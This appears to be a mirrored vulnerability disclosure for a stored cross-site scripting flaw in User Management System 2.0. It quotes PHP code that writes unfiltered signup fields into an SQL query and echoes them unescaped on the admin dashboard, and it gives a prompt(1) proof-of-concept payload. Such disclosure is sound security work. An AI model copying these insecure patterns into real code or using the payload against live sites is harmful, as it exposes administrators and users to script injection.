User management system 2.0 persistent crosssite scripting Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-04-23 | Type : webapps | Platform : php
This exploit / vulnerability User management system 2.0 persistent crosssite scripting is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Exploit Title: User Management System 2.0 - Persistent Cross-Site Scripting
# Author: Besim ALTINOK
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
# Version: v2.0
# Tested on: Xampp
# Credit: İsmail BOZKURT

------ Details:

1- Vulnerable code is here:

Insert user registration information to the DB without filtering.

if(isset($_POST['signup']))
{
$fname=$_POST['fname'];
$lname=$_POST['lname'];
$email=$_POST['email'];
$password=$_POST['password'];
$contact=$_POST['contact'];
$enc_password=$password;
$msg=mysqli_query($con,"insert into
users(fname,lname,email,password,contactno)
values('$fname','$lname','$email','$enc_password','$contact')");
if($msg)
{
echo "<script>alert('Register successfully');</script>";
}
}

2- In the admin dashboard:

Get fullName from DB and print it without any filtering

<?php $ret=mysqli_query($con,"select * from users");
$cnt=1;
while($row=mysqli_fetch_array($ret))
{?>
<tr>
<td><?php echo $cnt;?></td>
<td><?php echo $row['fname'];?></td>
<td><?php echo $row['lname'];?></td>
<td><?php echo $row['email'];?></td>
<td><?php echo $row['contactno'];?></td> <td><?php echo
$row['posting_date'];?></td>
</tr>

4- If we insert value of the "fname" as "script>prompt(1)</script>", we can
perform this attack as "Stored XSS"